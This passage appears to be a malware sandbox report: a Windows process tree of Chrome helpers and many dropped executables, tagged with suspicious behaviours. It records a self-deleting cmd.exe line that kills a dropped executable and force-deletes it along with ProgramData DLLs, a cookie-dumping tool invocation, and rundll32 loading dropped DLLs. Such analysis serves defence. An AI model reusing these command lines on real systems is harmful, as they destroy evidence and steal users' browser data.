                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5864 /prefetch:8
                                                                                          8⤵
                                                                                            PID:5296
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6008 /prefetch:8
                                                                                            8⤵
                                                                                              PID:5316
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6132 /prefetch:8
                                                                                              8⤵
                                                                                                PID:5272
                                                                                              • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                                                                                8⤵
                                                                                                  PID:5512
                                                                                                  • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff624faa890,0x7ff624faa8a0,0x7ff624faa8b0
                                                                                                    9⤵
                                                                                                      PID:5924
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5060 /prefetch:8
                                                                                                    8⤵
                                                                                                      PID:5236
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4232 /prefetch:8
                                                                                                      8⤵
                                                                                                        PID:5032
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4220 /prefetch:8
                                                                                                        8⤵
                                                                                                          PID:5352
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5492 /prefetch:8
                                                                                                          8⤵
                                                                                                            PID:5864
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5308 /prefetch:8
                                                                                                            8⤵
                                                                                                              PID:5060
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5476 /prefetch:8
                                                                                                              8⤵
                                                                                                                PID:5904
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5264 /prefetch:8
                                                                                                                8⤵
                                                                                                                  PID:4300
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5252 /prefetch:8
                                                                                                                  8⤵
                                                                                                                    PID:4636
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5540 /prefetch:8
                                                                                                                    8⤵
                                                                                                                      PID:1836
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5216 /prefetch:8
                                                                                                                      8⤵
                                                                                                                        PID:5396
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5204 /prefetch:8
                                                                                                                        8⤵
                                                                                                                          PID:4364
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5392 /prefetch:8
                                                                                                                          8⤵
                                                                                                                            PID:5952
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5384 /prefetch:8
                                                                                                                            8⤵
                                                                                                                              PID:5992
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6928 /prefetch:8
                                                                                                                              8⤵
                                                                                                                                PID:1460
                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7044 /prefetch:8
                                                                                                                                8⤵
                                                                                                                                  PID:5820
                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7200 /prefetch:8
                                                                                                                                  8⤵
                                                                                                                                    PID:936
                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7336 /prefetch:8
                                                                                                                                    8⤵
                                                                                                                                      PID:6052
                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7480 /prefetch:8
                                                                                                                                      8⤵
                                                                                                                                        PID:4124
                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7604 /prefetch:8
                                                                                                                                        8⤵
                                                                                                                                          PID:4704
                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7728 /prefetch:8
                                                                                                                                          8⤵
                                                                                                                                            PID:6140
                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7844 /prefetch:8
                                                                                                                                            8⤵
                                                                                                                                              PID:5028
                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7924 /prefetch:8
                                                                                                                                              8⤵
                                                                                                                                                PID:4564
                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7912 /prefetch:8
                                                                                                                                                8⤵
                                                                                                                                                  PID:5712
                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7884 /prefetch:8
                                                                                                                                                  8⤵
                                                                                                                                                    PID:5408
                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7180 /prefetch:8
                                                                                                                                                    8⤵
                                                                                                                                                      PID:5836
                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8420 /prefetch:8
                                                                                                                                                      8⤵
                                                                                                                                                        PID:5456
                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8540 /prefetch:8
                                                                                                                                                        8⤵
                                                                                                                                                          PID:5436
                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8424 /prefetch:8
                                                                                                                                                          8⤵
                                                                                                                                                            PID:4212
                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8664 /prefetch:8
                                                                                                                                                            8⤵
                                                                                                                                                              PID:1436
                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3872 /prefetch:8
                                                                                                                                                              8⤵
                                                                                                                                                                PID:5136
                                                                                                                                                          • C:\Users\Admin\Documents\zgbo_F2WSqefzRI5OjlhlZXY.exe
                                                                                                                                                            "C:\Users\Admin\Documents\zgbo_F2WSqefzRI5OjlhlZXY.exe"
                                                                                                                                                            6⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                            PID:2112
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im zgbo_F2WSqefzRI5OjlhlZXY.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\zgbo_F2WSqefzRI5OjlhlZXY.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                              7⤵
                                                                                                                                                                PID:5144
                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                  taskkill /im zgbo_F2WSqefzRI5OjlhlZXY.exe /f
                                                                                                                                                                  8⤵
                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                  PID:4100
                                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                  timeout /t 6
                                                                                                                                                                  8⤵
                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                  PID:4632
                                                                                                                                                            • C:\Users\Admin\Documents\KQVe9UK3q6cRY8joX2vJX2uw.exe
                                                                                                                                                              "C:\Users\Admin\Documents\KQVe9UK3q6cRY8joX2vJX2uw.exe"
                                                                                                                                                              6⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                              PID:4184
                                                                                                                                                              • C:\Program Files (x86)\Company\NewProduct\file4.exe
                                                                                                                                                                "C:\Program Files (x86)\Company\NewProduct\file4.exe"
                                                                                                                                                                7⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:3944
                                                                                                                                                              • C:\Program Files (x86)\Company\NewProduct\jingzhang.exe
                                                                                                                                                                "C:\Program Files (x86)\Company\NewProduct\jingzhang.exe"
                                                                                                                                                                7⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                PID:4368
                                                                                                                                                                • C:\Windows\SysWOW64\rUNdlL32.eXe
                                                                                                                                                                  "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\install.dll",shl
                                                                                                                                                                  8⤵
                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                  PID:1228
                                                                                                                                                              • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                                                                                                7⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                PID:4000
                                                                                                                                                              • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                                "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                                                                                                                7⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:4836
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                  8⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:5660
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                  8⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:4920
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                  8⤵
                                                                                                                                                                    PID:4184
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                    8⤵
                                                                                                                                                                      PID:5964
                                                                                                                                                                • C:\Users\Admin\Documents\zaNFwYHby7MuI4xlXAmCtSAd.exe
                                                                                                                                                                  "C:\Users\Admin\Documents\zaNFwYHby7MuI4xlXAmCtSAd.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                  PID:4288
                                                                                                                                                                  • C:\Users\Admin\Documents\zaNFwYHby7MuI4xlXAmCtSAd.exe
                                                                                                                                                                    C:\Users\Admin\Documents\zaNFwYHby7MuI4xlXAmCtSAd.exe
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:1784
                                                                                                                                                                • C:\Users\Admin\Documents\DJj6MOOHuPtvNDgRGgSW3IJo.exe
                                                                                                                                                                  "C:\Users\Admin\Documents\DJj6MOOHuPtvNDgRGgSW3IJo.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                  PID:4772
                                                                                                                                                                  • C:\Users\Admin\Documents\DJj6MOOHuPtvNDgRGgSW3IJo.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\DJj6MOOHuPtvNDgRGgSW3IJo.exe"
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                                    PID:2728
                                                                                                                                                                • C:\Users\Admin\Documents\avGNsFHt3smUacrPawnZPWlQ.exe
                                                                                                                                                                  "C:\Users\Admin\Documents\avGNsFHt3smUacrPawnZPWlQ.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                  PID:4960
                                                                                                                                                                • C:\Users\Admin\Documents\opPphxArfJK4cgpuT48OpWA7.exe
                                                                                                                                                                  "C:\Users\Admin\Documents\opPphxArfJK4cgpuT48OpWA7.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:4992
                                                                                                                                                                • C:\Users\Admin\Documents\6AkdW5BNhnnR2u4NAXW2gpT8.exe
                                                                                                                                                                  "C:\Users\Admin\Documents\6AkdW5BNhnnR2u4NAXW2gpT8.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                  PID:4904
                                                                                                                                                                  • C:\Users\Admin\Documents\6AkdW5BNhnnR2u4NAXW2gpT8.exe
                                                                                                                                                                    C:\Users\Admin\Documents\6AkdW5BNhnnR2u4NAXW2gpT8.exe
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:4056
                                                                                                                                                                • C:\Users\Admin\Documents\RQPsZmFx5ADu8N4V1DGobNjI.exe
                                                                                                                                                                  "C:\Users\Admin\Documents\RQPsZmFx5ADu8N4V1DGobNjI.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                  PID:508
                                                                                                                                                                  • C:\Users\Admin\Documents\RQPsZmFx5ADu8N4V1DGobNjI.exe
                                                                                                                                                                    C:\Users\Admin\Documents\RQPsZmFx5ADu8N4V1DGobNjI.exe
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:936
                                                                                                                                                                • C:\Users\Admin\Documents\5LHdZWjRy9SCHcIehCdQuaUd.exe
                                                                                                                                                                  "C:\Users\Admin\Documents\5LHdZWjRy9SCHcIehCdQuaUd.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                  PID:2140
                                                                                                                                                                  • C:\Users\Admin\Documents\5LHdZWjRy9SCHcIehCdQuaUd.exe
                                                                                                                                                                    C:\Users\Admin\Documents\5LHdZWjRy9SCHcIehCdQuaUd.exe
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:4016
                                                                                                                                                                • C:\Users\Admin\Documents\ZAI8gUhNev34la1F4WsRUuDs.exe
                                                                                                                                                                  "C:\Users\Admin\Documents\ZAI8gUhNev34la1F4WsRUuDs.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                  PID:1200
                                                                                                                                                                • C:\Users\Admin\Documents\IqHsCToJWqei0S8Vb0ZW5hbG.exe
                                                                                                                                                                  "C:\Users\Admin\Documents\IqHsCToJWqei0S8Vb0ZW5hbG.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                  PID:5028
                                                                                                                                                                  • C:\Users\Admin\Documents\IqHsCToJWqei0S8Vb0ZW5hbG.exe
                                                                                                                                                                    C:\Users\Admin\Documents\IqHsCToJWqei0S8Vb0ZW5hbG.exe
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:5608
                                                                                                                                                                • C:\Users\Admin\Documents\tQ0F68HQxTCKNZEwXq3DwxPT.exe
                                                                                                                                                                  "C:\Users\Admin\Documents\tQ0F68HQxTCKNZEwXq3DwxPT.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                  PID:4580
                                                                                                                                                                  • C:\Users\Admin\Documents\tQ0F68HQxTCKNZEwXq3DwxPT.exe
                                                                                                                                                                    "{path}"
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:6080
                                                                                                                                                                  • C:\Users\Admin\Documents\tQ0F68HQxTCKNZEwXq3DwxPT.exe
                                                                                                                                                                    "{path}"
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:5560
                                                                                                                                                                • C:\Users\Admin\Documents\LTEgsT12bSFfQfahqk_UgjTr.exe
                                                                                                                                                                  "C:\Users\Admin\Documents\LTEgsT12bSFfQfahqk_UgjTr.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                  PID:5228
                                                                                                                                                                  • C:\Windows\SysWOW64\rUNdlL32.eXe
                                                                                                                                                                    "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",setpwd
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                    PID:5696
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c arnatic_7.exe
                                                                                                                                                              4⤵
                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                              PID:504
                                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                        1⤵
                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                        PID:1092
                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                          2⤵
                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                          • Modifies registry class
                                                                                                                                                          PID:2640
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS82AD52A4\arnatic_7.exe
                                                                                                                                                        arnatic_7.exe
                                                                                                                                                        1⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                        PID:2248
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS82AD52A4\arnatic_7.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7zS82AD52A4\arnatic_7.exe
                                                                                                                                                          2⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          PID:1008
                                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                        1⤵
                                                                                                                                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                        PID:5044
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7E83.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7E83.exe
                                                                                                                                                        1⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                        PID:5780
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\D80D.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\D80D.exe
                                                                                                                                                        1⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                        PID:5228
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\DA31.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\DA31.exe
                                                                                                                                                        1⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                        PID:4588
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\DCC3.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\DCC3.exe
                                                                                                                                                        1⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                        PID:4540
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\3505.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\3505.exe
                                                                                                                                                        1⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                        PID:4804
